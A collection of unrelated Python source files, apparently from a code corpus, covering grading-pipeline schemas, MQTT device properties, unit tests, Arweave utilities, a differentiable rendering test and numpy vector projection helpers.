parser.add_argument('--filename', type=str, default='recipes_raw.json',
help='Recipe JSON file')
parser.add_argument('--status', type=int, default=50, help='Print status interval')
args = parser.parse_args()
main(args.filename, args.status)
|
496804 | course_config = {
"type": "object",
"patternProperties": {"": {"type": "array", "items": {"type": "string"}}},
}
grading_stage = {
"type": ["object", "null"],
"properties": {
"image": {"type": "string"},
"env": {"type": "object"},
"entrypoint": {"type": "array", "items": {"type": "string"}},
"networking": {"type": "boolean"},
"privileged": {"type": "boolean"},
"hostname": {"type": "string"},
"timeout": {"type": "number"},
"memory": {"type": "string"},
"logs": {"type": "boolean"},
},
"required": ["image"],
"additionalProperties": False,
}
grading_pipeline = {"type": ["array", "null"], "items": grading_stage}
grading_config = {
"type": "object",
"properties": {
"pre_processing_pipeline": grading_pipeline,
"student_pipeline": grading_pipeline,
"post_processing_pipeline": grading_pipeline,
"env": {"type": ["object", "null"]},
},
"required": ["student_pipeline"],
"additionalProperties": False,
}
ws_api_msg = {
"type": "object",
"properties": {"type": {"type": "string"}, "args": {"type": "object"}},
"required": ["type", "args"],
"additionalProperties": False,
}
|
496810 | from django import forms
from djangocms_text_ckeditor.fields import HTMLFormField
class SimpleTextForm(forms.Form):
text = HTMLFormField()
|
496811 | from ota_update.main.ota_updater import OTAUpdater
def download_and_install_update_if_available():
o = OTAUpdater('url-to-your-github-project')
o.download_and_install_update_if_available('wifi-ssid', 'wifi-password')
def start():
# your custom code goes here. Something like this: ...
# from main.x import YourProject
# project = YourProject()
# ...
def boot():
download_and_install_update_if_available()
start()
boot() |
496824 | import unittest
from unittest import mock
import tempfile
from shutil import rmtree
from os import path, getpid
from quikey.directories import AppDirectories
from quikey.qkdaemon import (
write_pid,
read_pid,
delete_pid,
ShutdownHook,
DatabaseChangeHandler,
)
class PidManagementTestCase(unittest.TestCase):
def setUp(self):
self.data = tempfile.mkdtemp()
self.config = tempfile.mkdtemp()
self.cache = tempfile.mkdtemp()
self.appDirs = AppDirectories(self.data, self.config, self.cache)
def tearDown(self):
rmtree(self.data)
rmtree(self.config)
rmtree(self.cache)
def testWritePid(self):
write_pid(self.appDirs)
self.assertTrue(path.exists(path.join(self.appDirs.cache, "quikey.pid")))
def testReadPid(self):
write_pid(self.appDirs)
p = read_pid(self.appDirs)
self.assertIsNotNone(p)
self.assertEqual(getpid(), int(p))
def testDeletePid(self):
write_pid(self.appDirs)
delete_pid(self.appDirs)
self.assertFalse(path.exists(path.join(self.appDirs.cache, "quikey.pid")))
class ShutdownHookTestCase(unittest.TestCase):
def setUp(self):
self.data = tempfile.mkdtemp()
self.config = tempfile.mkdtemp()
self.cache = tempfile.mkdtemp()
self.appDirs = AppDirectories(self.data, self.config, self.cache)
write_pid(self.appDirs)
def tearDown(self):
pass
@mock.patch("pynput.keyboard.Listener")
@mock.patch("quikey.filewatch.InotifyWatch")
def testHookCalled(self, listener, inotify):
hook = ShutdownHook(listener, inotify, self.appDirs)
hook(0, None)
listener.stop.assert_called_with()
inotify.stop.assert_called_with()
if __name__ == "__main__":
unittest.main()
|
496844 | import demistomock as demisto # noqa: F401
from bs4 import BeautifulSoup
from CommonServerPython import * # noqa: F401
args = demisto.args()
response = requests.get(args.get("url"))
soup = BeautifulSoup(response.content, "html.parser")
article = soup.find("article").get_text()
_, article = article.split("Phishing Email Campaign", 1)
article = article.replace('[.]', '.')
return_results(CommandResults(readable_output=article, outputs={"http.parsedBlog": article}))
|
496854 | from swmmio.defs.constants import red, purple, lightblue, lightgreen
FLOOD_IMPACT_CATEGORIES = {
'increased_flooding': {
'fill': red,
},
'new_flooding': {
'fill': purple,
},
'decreased_flooding': {
'fill': lightblue,
},
'eliminated_flooding': {
'fill': lightgreen,
},
}
|
496865 | from mock import patch
from django.test import TestCase
from django.utils.timezone import now
from pycon.bulkemail.models import INPROGRESS, BulkEmail, UNSENT, ERROR, SENT
from pycon.bulkemail.tasks import send_bulk_emails, MAX_TIME, RETRY_INTERVAL
from pycon.bulkemail.tests.factories import BulkEmailFactory
@patch('pycon.bulkemail.models.BulkEmail.send')
class BulkEmailSendTaskTest(TestCase):
def test_nothing_to_send(self, mock_send):
# Should just return
send_bulk_emails()
self.assertEqual(0, mock_send.call_count)
def test_long_inprogress_emails(self, mock_send):
# If an email has been INPROGRESS too long, the task
# should change it to UNSENT so we can do something
# with it.
bulk = BulkEmailFactory(status=INPROGRESS, start_time=now() - 2 * MAX_TIME)
BulkEmailFactory(status=INPROGRESS, start_time=now()) # Should not retry (yet)
send_bulk_emails()
self.assertEqual(1, mock_send.call_count)
bulk2 = BulkEmail.objects.get(pk=bulk.pk)
self.assertEqual(UNSENT, bulk2.status)
self.assertEqual(1, mock_send.call_count)
def test_retry_error_emails(self, mock_send):
# After long enough, retry errored emails
BulkEmailFactory(status=ERROR, end_time=now()) # Should not retry (yet)
bulk = BulkEmailFactory(status=ERROR, end_time=now() - 2 * RETRY_INTERVAL)
send_bulk_emails()
self.assertEqual(1, mock_send.call_count)
bulk2 = BulkEmail.objects.get(pk=bulk.pk)
self.assertEqual(UNSENT, bulk2.status)
self.assertEqual(1, mock_send.call_count)
def test_call_send(self, mock_send):
# Make multiple BulkEmails, but we should only call send on
# the one with the UNSENT status.
BulkEmailFactory(status=UNSENT)
BulkEmailFactory(status=ERROR)
BulkEmailFactory(status=SENT)
BulkEmailFactory(status=INPROGRESS)
send_bulk_emails()
self.assertEqual(1, mock_send.call_count)
def test_call_exceptions(self, mock_send):
# If sending raises exceptions, we still keep going
BulkEmailFactory(status=UNSENT)
BulkEmailFactory(status=UNSENT)
mock_send.side_effect = Exception("Intentional exception during testing")
send_bulk_emails()
self.assertEqual(2, mock_send.call_count)
|
496870 | import ConfigParser
from pylease.logger import LOGME as logme # noqa
import os
import pylease.cmd
import pylease.ext
__version__ = '0.3.2'
class Pylease(object):
"""
The main class of Pylease, which contains all the needed resources for extensions. This class is initialised once and by Pylease,
which is the so called ``lizy`` object. It is passed to :class:`~pylease.cmd.Command` and :class:`~pylease.ext.Extension` instances.
Attributes:
info_container (pylease.InfoContainer): Contains information about current status of the project. Minimal information is
``name`` and ``version``.
commands (dict): A dictionary of Pylease commands, including commands defined in extensions if any. The values of the dictionary
are instances of :class:`~pylease.cmd.Command` class.
parser (argparse.ArgumentParser): The root parser of Pylease. Use this object to add command line arguments to Pylease on the
same level as ``--version`` and ``--help``.
config (dict): A dictionary representing the configuration parsed from ``setup.cfg`` defined under ``[pylease]`` section. If a
configuration value in the configuration file is defined as ``key1 = valA, valB, valC`` then the value of the ``key1`` key of
this attribute will be an instance of :class:`~list` and be equal to ``['valA', 'valB, 'valC']``.
"""
def __init__(self, parser, cmd_subparsers, info_container):
super(Pylease, self).__init__()
self.parser = parser
self.cmd_subparsers = cmd_subparsers
self.info_container = info_container
self.commands = {}
config = {}
config_parser = ConfigParser.SafeConfigParser()
try:
if os.path.exists('setup.cfg'):
config_parser.read('setup.cfg')
items = config_parser.items('pylease')
for item in items:
config[item[0]] = item[1]
except ConfigParser.NoSectionError:
logme.warn('No pylease section found in setup.cfg')
self.config = config
self._load_extensions()
def add_command(self, name, command):
self.commands[name] = command
def execute_command(self, name, args):
return self.commands[name](args)
def add_subparser(self, *args, **kwargs):
return self.cmd_subparsers.add_parser(*args, **kwargs)
def _get_config_list_value(self, key):
values = None
if key in self.config:
values_str_list = self.config[key].replace(' ', '')
values = values_str_list.split(',')
return values
def get_version_files(self):
return self._get_config_list_value('version-files')
def get_plugins(self):
return self._get_config_list_value('use-plugins') or []
def _load_extensions(self):
extension_packages = self.get_plugins()
for package in extension_packages:
__import__(package)
class InfoContainer(object):
# pylint: disable=too-few-public-methods
"""
A simple container that maps a provided dictionary to its attributes. This provides the current status of the project,
and the minimal built-in information attributes are the following:
Attributes:
name (str): The name of the project.
version (str): The current versin of the project
is_empty (bool): The status of current working directory, i.e. indicates whether it is empty or not.
"""
def __init__(self):
super(InfoContainer, self).__init__()
self.name = None
self.version = None
self.is_empty = False
def set_info(self, **kwargs):
"""
Used to extend the information about the project.
Example:
Below are two options on how to use/extend the ``InfoContainer``::
info = InfoContainer()
# Option 1
info.set_info(info1='value2', info2='value2')
# Option 2
more_info = {'info3': 'value3'}
info.set_info(**more_info)
# Then you can access your info as instance attributes
print(info.info2) # will print 'value2'
"""
for key in kwargs:
setattr(self, key, kwargs[key])
|
496917 | import hashlib
from Crypto.Signature import PKCS1_PSS
from Crypto.Hash import SHA256
from jose import jwk
from jose.utils import base64url_encode, base64url_decode, base64
def create_tag(name, value, v2):
if v2:
b64name = name
b64value = value
else:
b64name = base64url_encode(name.encode('ascii')).decode()
b64value = base64url_encode(value.encode('ascii')).decode()
return {"name": b64name, "value": b64value}
def encode_tag(tag):
b64name = base64url_encode(tag['name'].encode('ascii')).decode()
b64value = base64url_encode(tag['value'].encode('ascii')).decode()
return {"name": b64name, "value": b64value}
def decode_tag(tag):
name = base64url_decode(tag['name'].encode())
value = base64url_decode(tag['value'].encode())
return {'name': name, 'value': value}
def owner_to_address(owner):
result = base64url_encode(hashlib.sha256(base64url_decode(owner.encode('ascii'))).digest()).decode()
return result
def winston_to_ar(winston_str: str) -> float:
length = len(winston_str)
if length > 12:
past_twelve = length - 12
winston_str = "{}.{}".format(winston_str[0:past_twelve], winston_str[-12:])
else:
lessthan_twelve = 12 - length
winston_str = "0.{}{}".format("0" * lessthan_twelve, winston_str)
return float(winston_str)
def ar_to_winston(ar_amount: str) -> str:
return str(int(float(ar_amount) * 10**12))
def concat_buffers(buffers):
total_length = 0
for buffer in buffers:
total_length += len(buffer)
offset = 0
temp = b'\x00' * total_length
temp = bytearray(temp)
for buffer in buffers:
for i in range(len(buffer)):
temp[i + offset] = buffer[i]
offset += len(buffer)
return bytes(temp)
|
496961 | import mock
from twindb_backup.share import share
@mock.patch('twindb_backup.share.print')
# @mock.patch('twindb_backup.share.get_destination')
def test_share_backup_cli(mock_print):
mock_config = mock.Mock()
mock_config.get.return_value = "/foo/bar"
mock_dst = mock.Mock()
mock_dst.remote_path = '/foo/bar'
mock_config.destination.return_value = mock_dst
mock_dst.find_files.return_value = ["/foo/bar1", "/foo/bar"]
share(mock_config, "/foo/bar")
mock_print.assert_called_once()
mock_dst.share.assert_called_once_with("/foo/bar")
mock_config.destination.assert_called_once_with()
|
496973 | import os
from dlocr.densenet.core import DenseNetOCR
from dlocr.densenet.data_loader import load_dict
default_densenet_weight_path = os.path.join(os.getcwd(), os.path.dirname(__file__),
"../weights/weights-densent-init.hdf5")
default_densenet_config_path = os.path.join(os.getcwd(), os.path.dirname(__file__), "../config/densent-default.json")
default_dict_path = os.path.join(os.getcwd(), os.path.dirname(__file__), "../dictionary/char_std_5990.txt")
__densenet = None
def get_or_create(densenet_config_path=default_densenet_config_path,
densenet_weight_path=default_densenet_weight_path):
global __densenet
if __densenet is None:
config = DenseNetOCR.load_config(densenet_config_path)
__densenet = DenseNetOCR(**config, weight_path=densenet_weight_path)
return __densenet
|
496974 | import factory
from factory.fuzzy import FuzzyText
from fjord.feedback.tests import ProductFactory
from fjord.suggest.providers.trigger.models import TriggerRule
class TriggerRuleFactory(factory.DjangoModelFactory):
class Meta:
model = TriggerRule
slug = FuzzyText()
title = 'OU812'
description = 'Oh, you ate one, too?'
url = 'https://wiki.mozilla.org/Firefox/Input'
is_enabled = True
@factory.post_generation
def products(self, create, extracted, **kwargs):
if not create:
return
if extracted:
for product in extracted:
self.products.add(product)
|
496980 | import pytest # noqa
import requests
import json
import gevent
from eth_utils import is_same_address
from microraiden.constants import API_PATH
from microraiden.proxy.paywalled_proxy import PaywalledProxy
def test_resources(doggo_proxy, api_endpoint_address, users_db):
auth_credentials = ('<PASSWORD>', 'password')
users_db.add_user(auth_credentials[0], auth_credentials[1])
users_db.token_expiry_seconds = 0.5
api_path = "http://" + api_endpoint_address + API_PATH
# without auth, refuse access
rv = requests.get(api_path + "/admin")
assert rv.status_code == 401
# bad login
rv = requests.get(api_path + "/login", auth=('user', '<PASSWORD>'))
assert rv.status_code == 401
# good login, we got the token
rv = requests.get(api_path + "/login", auth=auth_credentials)
assert rv.status_code == 200
json_response = json.loads(rv.text)
assert 'token' in json_response
token_credentials = (json_response['token'], '')
# use the token to login
rv = requests.get(api_path + "/admin", auth=token_credentials)
assert rv.status_code == 200
# logout with an invalid token
rv = requests.get(api_path + "/logout", auth=('invalid_token', ''))
assert rv.status_code == 401
# logout with a valid token
rv = requests.get(api_path + "/logout", auth=token_credentials)
assert rv.status_code == 200
# after logout, refuse access
rv = requests.get(api_path + "/admin", auth=token_credentials)
assert rv.status_code == 401
# TODO: test token expiration. we must set token expiry timeout somehow
# login again
rv = requests.get(api_path + "/login", auth=auth_credentials)
assert rv.status_code == 200
json_response = json.loads(rv.text)
assert 'token' in json_response
token_credentials = (json_response['token'], '')
gevent.sleep(1)
# use the token to login
rv = requests.get(api_path + "/admin", auth=token_credentials)
assert rv.status_code == 401
def test_stats(doggo_proxy: PaywalledProxy, api_endpoint_address):
api_path = "http://" + api_endpoint_address + API_PATH
rv = requests.get(api_path + "/stats")
assert rv.status_code == 200
stats = json.loads(rv.text)
assert 'balance_sum' in stats
assert 'deposit_sum' in stats
assert 'token_address' in stats
assert 'receiver_address' in stats
assert 'contract_address' in stats
assert stats['sync_block'] == doggo_proxy.channel_manager.blockchain.sync_start_block
assert is_same_address(stats['receiver_address'], doggo_proxy.channel_manager.receiver)
token_address = doggo_proxy.channel_manager.token_contract.address
assert is_same_address(stats['token_address'], token_address)
contract_address = doggo_proxy.channel_manager.channel_manager_contract.address
assert is_same_address(stats['contract_address'], contract_address)
|
497000 | import pyredner
import numpy as np
import torch
# From the test_single_triangle.py test case but with viewport
pyredner.set_use_gpu(torch.cuda.is_available())
cam = pyredner.Camera(position = torch.tensor([0.0, 0.0, -5.0]),
look_at = torch.tensor([0.0, 0.0, 0.0]),
up = torch.tensor([0.0, 1.0, 0.0]),
fov = torch.tensor([45.0]), # in degree
clip_near = 1e-2, # needs to > 0
resolution = (1024, 1024),
viewport = (200, 300, 700, 800))
mat_grey = pyredner.Material(\
diffuse_reflectance = \
torch.tensor([0.5, 0.5, 0.5], device = pyredner.get_device()))
materials = [mat_grey]
shape_triangle = pyredner.Shape(\
vertices = torch.tensor([[-1.7, 1.0, 0.0], [1.0, 1.0, 0.0], [-0.5, -1.0, 0.0]],
device = pyredner.get_device()),
indices = torch.tensor([[0, 1, 2]], dtype = torch.int32,
device = pyredner.get_device()),
uvs = None,
normals = None,
material_id = 0)
shape_light = pyredner.Shape(\
vertices = torch.tensor([[-1.0, -1.0, -7.0],
[ 1.0, -1.0, -7.0],
[-1.0, 1.0, -7.0],
[ 1.0, 1.0, -7.0]], device = pyredner.get_device()),
indices = torch.tensor([[0, 1, 2],[1, 3, 2]],
dtype = torch.int32, device = pyredner.get_device()),
uvs = None,
normals = None,
material_id = 0)
shapes = [shape_triangle, shape_light]
light = pyredner.AreaLight(shape_id = 1,
intensity = torch.tensor([20.0,20.0,20.0]))
area_lights = [light]
scene = pyredner.Scene(cam, shapes, materials, area_lights)
scene_args = pyredner.RenderFunction.serialize_scene(\
scene = scene,
num_samples = 16,
max_bounces = 1)
render = pyredner.RenderFunction.apply
img = render(0, *scene_args)
pyredner.imwrite(img.cpu(), 'results/test_viewport/target.exr')
pyredner.imwrite(img.cpu(), 'results/test_viewport/target.png')
target = pyredner.imread('results/test_viewport/target.exr')
if pyredner.get_use_gpu():
target = target.cuda(device = pyredner.get_device())
# Perturb the scene, this is our initial guess.
shape_triangle.vertices = torch.tensor(\
[[-2.0,1.5,0.3], [0.9,1.2,-0.3], [-0.4,-1.4,0.2]],
device = pyredner.get_device(),
requires_grad = True) # Set requires_grad to True since we want to optimize this
scene_args = pyredner.RenderFunction.serialize_scene(\
scene = scene,
num_samples = 16,
max_bounces = 1)
img = render(1, *scene_args)
pyredner.imwrite(img.cpu(), 'results/test_single_triangle/init.png')
diff = torch.abs(target - img)
pyredner.imwrite(diff.cpu(), 'results/test_single_triangle/init_diff.png')
optimizer = torch.optim.Adam([shape_triangle.vertices], lr=5e-2)
for t in range(200):
print('iteration:', t)
optimizer.zero_grad()
scene_args = pyredner.RenderFunction.serialize_scene(\
scene = scene,
num_samples = 4, # We use less samples in the Adam loop.
max_bounces = 1)
img = render(t+1, *scene_args)
pyredner.imwrite(img.cpu(), 'results/test_viewport/iter_{}.png'.format(t))
loss = (img - target).pow(2).sum()
print('loss:', loss.item())
loss.backward()
print('grad:', shape_triangle.vertices.grad)
optimizer.step()
print('vertices:', shape_triangle.vertices)
scene_args = pyredner.RenderFunction.serialize_scene(\
scene = scene,
num_samples = 16,
max_bounces = 1)
img = render(202, *scene_args)
pyredner.imwrite(img.cpu(), 'results/test_viewport/final.exr')
pyredner.imwrite(img.cpu(), 'results/test_viewport/final.png')
pyredner.imwrite(torch.abs(target - img).cpu(), 'results/test_viewport/final_diff.png')
from subprocess import call
call(["ffmpeg", "-framerate", "24", "-i",
"results/test_viewport/iter_%d.png", "-vb", "20M",
"results/test_viewport/out.mp4"])
|
497003 | import torch
from .base_sampler import BaseSampler
class SelectiveIoUSampler(BaseSampler):
def __init__(self, **kwargs):
pass
def _sample_pos(self, **kwargs):
raise NotImplementedError
def _sample_neg(self, **kwargs):
raise NotImplementedError
def sample(self, assign_result, bboxes, gt_bboxes, **kwargs):
pos_inds = torch.nonzero(
assign_result.gt_inds > 0).squeeze(-1).unique()
neg_inds = torch.nonzero(
assign_result.gt_inds == 0).squeeze(-1).unique()
confuse_inds = torch.nonzero(assign_result.gt_inds == -2).squeeze(-1).unique()
gt_flags = bboxes.new_zeros(bboxes.shape[0], dtype=torch.uint8)
sampling_result = SamplingResult(pos_inds, neg_inds, confuse_inds, bboxes, gt_bboxes,
assign_result, gt_flags)
return sampling_result
class SamplingResult(object):
def __init__(self, pos_inds, neg_inds, confuse_inds, bboxes, gt_bboxes, assign_result, gt_flags):
self.pos_inds = pos_inds
self.neg_inds = neg_inds
self.confuse_inds = confuse_inds
self.pos_bboxes = bboxes[pos_inds]
self.neg_bboxes = bboxes[neg_inds]
self.confuse_bboxes = bboxes[confuse_inds]
self.pos_is_gt = gt_flags[pos_inds]
self.num_gts = gt_bboxes.shape[0]
self.pos_assigned_gt_inds = assign_result.gt_inds[pos_inds] - 1
self.pos_gt_bboxes = gt_bboxes[self.pos_assigned_gt_inds, :]
if assign_result.labels is not None:
self.pos_gt_labels = assign_result.labels[pos_inds]
else:
self.pos_gt_labels = None
@property
def bboxes(self):
return torch.cat([self.pos_bboxes, self.neg_bboxes, self.confuse_bboxes])
|
497019 | from jsonpath_rw import parse
def get_cjson_energy(cjson):
energy = parse('properties.totalEnergy').find(cjson)
if energy:
return energy[0].value
return None
|
497042 | import uasyncio as asyncio
from homie.constants import STRING, T_SET, TRUE, FALSE
from homie.validator import payload_is_valid
class BaseProperty:
def __init__(
self,
id,
name=None,
settable=False,
retained=True,
unit=None,
datatype=STRING,
format=None,
default=None,
restore=True,
on_message=None,
pub_on_upd=True,
):
self._value = default
self.id = id
self.name = name
self.settable = settable
self.retained = retained
self.unit = unit
self.datatype = datatype
self.format = format
self.restore = restore
self.on_message = on_message
self.pub_on_upd = pub_on_upd
self.topic = None
self.node = None
# Keep for backward compatibility
@property
def data(self):
return self._value
# Keep for backward compatibility
@data.setter
def data(self, value):
self.value = value
@property
def value(self):
return self._value
@value.setter
def value(self, value):
"""Assign new value if changed or self.pub_on_upd is True and publish to mqtt"""
if value != self._value:
self._value = value
self.publish()
elif self.pub_on_upd:
self.publish()
def set_topic(self):
self.topic = "{}/{}/{}".format(
self.node.device.dtopic,
self.node.id,
self.id
)
def publish(self):
if self._value is None:
return
asyncio.create_task(
self.node.device.publish(
self.topic,
self.value,
self.retained
)
)
async def subscribe(self):
# Restore from topic with retained message on device start
if self.restore and self.node.device.first_start is True:
self.node.device.callback_topics[self.topic] = self.restore_handler
await self.node.device.subscribe(self.topic)
# Subscribe to settable (/set) topics
if self.settable is True:
topic = "{}/set".format(self.topic)
self.node.device.callback_topics[topic] = self.message_handler
await self.node.device.subscribe(topic)
def restore_handler(self, topic, payload, retained):
""" Gets called when the property should be restored from mqtt """
# Retained messages are not allowed on /set topics
if topic.endswith(T_SET):
return
# Unsubscribe from topic and remove the callback handler
asyncio.create_task(self.node.device.unsubscribe(topic))
del self.node.device.callback_topics[topic]
if payload_is_valid(self, payload):
if payload != self._value:
if self.on_message:
self.on_message(topic, payload, retained)
self._value = payload
def message_handler(self, topic, payload, retained):
""" Gets called when the property receive a message on /set topic """
# No reatained messages allowed on /set topics
if retained:
return
if payload_is_valid(self, payload):
if self.on_message:
self.on_message(topic, payload, retained)
self.value = payload
async def publish_properties(self):
topic = self.topic
publish = self.node.device.publish
await publish("{}/$name".format(topic), self.name)
await publish("{}/$datatype".format(topic), self.datatype)
if self.format is not None:
await publish("{}/$format".format(topic), self.format)
if self.settable is True:
await publish("{}/$settable".format(topic), TRUE)
if self.retained is False:
await publish("{}/$retained".format(topic), FALSE)
if self.unit is not None:
await publish("{}/$unit".format(topic), self.unit)
HomieProperty = BaseProperty
# Keep for backward compatibility
HomieNodeProperty = BaseProperty
|
497075 | import numpy
import scipy.stats
import math
def one_hot(array, N):
"""
Convert an array of numbers to an array of one-hot vectors.
:param array: classes to convert
:type array: numpy.ndarray
:param N: number of classes
:type N: int
:return: one-hot vectors
:rtype: numpy.ndarray
"""
array = array.astype(int)
assert numpy.max(array) < N
assert numpy.min(array) >= 0
one_hot = numpy.zeros((array.shape[0], N))
one_hot[numpy.arange(array.shape[0]), array] = 1
return one_hot
def expand_as(array, array_as):
"""
Expands the tensor using view to allow broadcasting.
:param array: input tensor
:type array: numpy.ndarray
:param array_as: reference tensor
:type array_as: torch.Tensor or torch.autograd.Variable
:return: tensor expanded with singelton dimensions as tensor_as
:rtype: torch.Tensor or torch.autograd.Variable
"""
shape = list(array.shape)
for i in range(len(array.shape), len(array_as.shape)):
shape.append(1)
return array.reshape(shape)
def concatenate(array1, array2, axis=0):
"""
Basically a wrapper for numpy.concatenate, with the exception
that the array itself is returned if its None or evaluates to False.
:param array1: input array or None
:type array1: mixed
:param array2: input array
:type array2: numpy.ndarray
:param axis: axis to concatenate
:type axis: int
:return: concatenated array
:rtype: numpy.ndarray
"""
assert isinstance(array2, numpy.ndarray)
if array1 is not None:
assert isinstance(array1, numpy.ndarray)
return numpy.concatenate((array1, array2), axis=axis)
else:
return array2
def exponential_norm(batch_size, dim, epsilon=1, ord=2):
"""
Sample vectors uniformly by norm and direction separately.
:param batch_size: how many vectors to sample
:type batch_size: int
:param dim: dimensionality of vectors
:type dim: int
:param epsilon: epsilon-ball
:type epsilon: float
:param ord: norm to use
:type ord: int
:return: batch_size x dim tensor
:rtype: numpy.ndarray
"""
random = numpy.random.randn(batch_size, dim)
random /= numpy.repeat(numpy.linalg.norm(random, ord=ord, axis=1).reshape(-1, 1), axis=1, repeats=dim)
random *= epsilon
truncated_normal = scipy.stats.truncexpon.rvs(1, loc=0, scale=0.9, size=(batch_size, 1))
random *= numpy.repeat(truncated_normal, axis=1, repeats=dim)
return random
def uniform_norm(batch_size, dim, epsilon=1, ord=2):
"""
Sample vectors uniformly by norm and direction separately.
:param batch_size: how many vectors to sample
:type batch_size: int
:param dim: dimensionality of vectors
:type dim: int
:param epsilon: epsilon-ball
:type epsilon: float
:param ord: norm to use
:type ord: int
:return: batch_size x dim tensor
:rtype: numpy.ndarray
"""
random = numpy.random.randn(batch_size, dim)
random /= numpy.repeat(numpy.linalg.norm(random, ord=ord, axis=1).reshape(-1, 1), axis=1, repeats=dim)
random *= epsilon
uniform = numpy.random.uniform(0, 1, (batch_size, 1)) # exponent is only difference!
random *= numpy.repeat(uniform, axis=1, repeats=dim)
return random
def uniform_ball(batch_size, dim, epsilon=1, ord=2):
"""
Sample vectors uniformly in the n-ball.
See Harman et al., On decompositional algorithms for uniform sampling from n-spheres and n-balls.
:param batch_size: how many vectors to sample
:type batch_size: int
:param dim: dimensionality of vectors
:type dim: int
:param epsilon: epsilon-ball
:type epsilon: float
:param ord: norm to use
:type ord: int
:return: batch_size x dim tensor
:rtype: numpy.ndarray
"""
random = numpy.random.randn(batch_size, dim)
random /= numpy.repeat(numpy.linalg.norm(random, ord=ord, axis=1).reshape(-1, 1), axis=1, repeats=dim)
random *= epsilon
uniform = numpy.random.uniform(0, 1, (batch_size, 1)) ** (1. / dim)
random *= numpy.repeat(uniform, axis=1, repeats=dim)
return random
def uniform_sphere(batch_size, dim, epsilon=1, ord=2):
"""
Sample vectors uniformly on the n-sphere.
See Harman et al., On decompositional algorithms for uniform sampling from n-spheres and n-balls.
:param batch_size: how many vectors to sample
:type batch_size: int
:param dim: dimensionality of vectors
:type dim: int
:param epsilon: epsilon-ball
:type epsilon: float
:param ord: norm to use
:type ord: int
:return: batch_size x dim tensor
:rtype: numpy.ndarray
"""
random = numpy.random.randn(batch_size, dim)
random /= numpy.repeat(numpy.linalg.norm(random, ord=ord, axis=1).reshape(-1, 1), axis=1, repeats=dim)
random *= epsilon
return random
def truncated_normal(size, lower=-2, upper=2):
"""
Sample from truncated normal.
See https://stackoverflow.com/questions/18441779/how-to-specify-upper-and-lower-limits-when-using-numpy-random-normal.
:param size: size of vector
:type size: [int]
:param lower: lower bound
:type lower: float
:param upper: upper bound
:type upper: float
:return: batch_size x dim tensor
:rtype: numpy.ndarray
"""
return scipy.stats.truncnorm.rvs(lower, upper, size=size)
def project_simplex(v, s=1):
"""
Taken from https://gist.github.com/daien/1272551/edd95a6154106f8e28209a1c7964623ef8397246.
Compute the Euclidean projection on a positive simplex
Solves the optimisation problem (using the algorithm from [1]):
min_w 0.5 * || w - v ||_2^2 , s.t. \sum_i w_i = s, w_i >= 0
Parameters
----------
v: (n,) numpy array,
n-dimensional vector to project
s: int, optional, default: 1,
radius of the simplex
Returns
-------
w: (n,) numpy array,
Euclidean projection of v on the simplex
Notes
-----
The complexity of this algorithm is in O(n log(n)) as it involves sorting v.
Better alternatives exist for high-dimensional sparse vectors (cf. [1])
However, this implementation still easily scales to millions of dimensions.
References
----------
[1] Efficient Projections onto the .1-Ball for Learning in High Dimensions
<NAME>, <NAME>, <NAME>, and <NAME>.
International Conference on Machine Learning (ICML 2008)
http://www.cs.berkeley.edu/~jduchi/projects/DuchiSiShCh08.pdf
"""
assert s > 0, "Radius s must be strictly positive (%d <= 0)" % s
n, = v.shape # will raise ValueError if v is not 1-D
# check if we are already on the simplex
if v.sum() == s and numpy.alltrue(v >= 0):
# best projection: itself!
return v
# get the array of cumulative sums of a sorted (decreasing) copy of v
u = numpy.sort(v)[::-1]
cssv = numpy.cumsum(u)
# get the number of > 0 components of the optimal solution
rho = numpy.nonzero(u * numpy.arange(1, n+1) > (cssv - s))[0][-1]
# compute the Lagrange multiplier associated to the simplex constraint
theta = float(cssv[rho] - s) / rho
# compute the projection by thresholding v using theta
w = (v - theta).clip(min=0)
return w
def projection_simplex_sort(v, z=1):
n_features = v.shape[0]
u = numpy.sort(v)[::-1]
cssv = numpy.cumsum(u) - z
ind = numpy.arange(n_features) + 1
cond = u - cssv / ind > 0
rho = ind[cond][-1]
theta = cssv[cond][-1] / float(rho)
w = numpy.maximum(v - theta, 0)
return w
def projection_simplex_pivot(v, z=1, random_state=None):
rs = numpy.random.RandomState(random_state)
n_features = len(v)
U = numpy.arange(n_features)
s = 0
rho = 0
while len(U) > 0:
G = []
L = []
k = U[rs.randint(0, len(U))]
ds = v[k]
for j in U:
if v[j] >= v[k]:
if j != k:
ds += v[j]
G.append(j)
elif v[j] < v[k]:
L.append(j)
drho = len(G) + 1
if s + ds - (rho + drho) * v[k] < z:
s += ds
rho += drho
U = L
else:
U = G
theta = (s - z) / float(rho)
return numpy.maximum(v - theta, 0)
def projection_simplex_bisection(v, z=1, tau=0.0001, max_iter=1000):
lower = 0
upper = numpy.max(v)
current = numpy.inf
for it in xrange(max_iter):
if numpy.abs(current) / z < tau and current < 0:
break
theta = (upper + lower) / 2.0
w = numpy.maximum(v - theta, 0)
current = numpy.sum(w) - z
if current <= 0:
upper = theta
else:
lower = theta
return w
def project_ball(array, epsilon=1, ord=2):
"""
Compute the orthogonal projection of the input tensor (as vector) onto the L_ord epsilon-ball.
**Assumes the first dimension to be batch dimension, which is preserved.**
:param array: array
:type array: numpy.ndarray
:param epsilon: radius of ball.
:type epsilon: float
:param ord: order of norm
:type ord: int
:return: projected vector
:rtype: torch.autograd.Variable or torch.Tensor
"""
assert isinstance(array, numpy.ndarray), 'given tensor should be numpy.ndarray'
if ord == 0:
assert epsilon >= 1
size = array.shape
flattened_size = numpy.prod(numpy.array(size[1:]))
array = array.reshape(-1, flattened_size)
sorted = numpy.sort(array, axis=1)
k = int(math.ceil(epsilon))
thresholds = sorted[:, -k]
mask = (array >= expand_as(thresholds, array)).astype(float)
array *= mask
elif ord == 1:
size = array.shape
flattened_size = numpy.prod(numpy.array(size[1:]))
array = array.reshape(-1, flattened_size)
for i in range(array.shape[0]):
# compute the vector of absolute values
u = numpy.abs(array[i])
# check if v is already a solution
if u.sum() <= epsilon:
# L1-norm is <= s
continue
# v is not already a solution: optimum lies on the boundary (norm == s)
# project *u* on the simplex
#w = project_simplex(u, s=epsilon)
w = projection_simplex_sort(u, z=epsilon)
# compute the solution to the original problem on v
w *= numpy.sign(array[i])
array[i] = w
if len(size) == 4:
array = array.reshape(-1, size[1], size[2], size[3])
elif len(size) == 2:
array = array.reshape(-1, size[1])
elif ord == 2:
size = array.shape
flattened_size = numpy.prod(numpy.array(size[1:]))
array = array.reshape(-1, flattened_size)
clamped = numpy.clip(epsilon/numpy.linalg.norm(array, 2, axis=1), a_min=None, a_max=1)
clamped = clamped.reshape(-1, 1)
